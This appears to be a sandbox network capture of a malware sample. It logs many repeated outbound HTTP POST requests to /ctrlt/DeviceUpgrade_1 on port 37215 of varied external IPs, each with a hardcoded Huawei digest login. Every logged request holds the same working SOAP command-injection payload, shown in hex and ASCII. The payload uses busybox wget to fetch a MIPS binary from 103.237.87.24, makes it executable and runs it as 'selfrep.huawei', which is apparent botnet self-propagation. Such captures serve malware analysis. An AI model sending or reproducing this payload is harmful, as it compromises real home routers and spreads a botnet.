                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  387192.168.2.1343348157.14.79.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100862980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  388192.168.2.1346484157.64.185.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.102264881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  389192.168.2.135532041.79.211.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.102281094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  390192.168.2.135087441.236.235.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.102283001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  391192.168.2.1332918157.83.233.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.102303028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  392192.168.2.136037841.149.54.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.103584051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  393192.168.2.1347206197.133.58.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.103599072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  394192.168.2.1343172197.110.101.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.103610039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  395192.168.2.1341696157.212.34.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.103662014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  396192.168.2.1354778197.5.234.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.103679895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 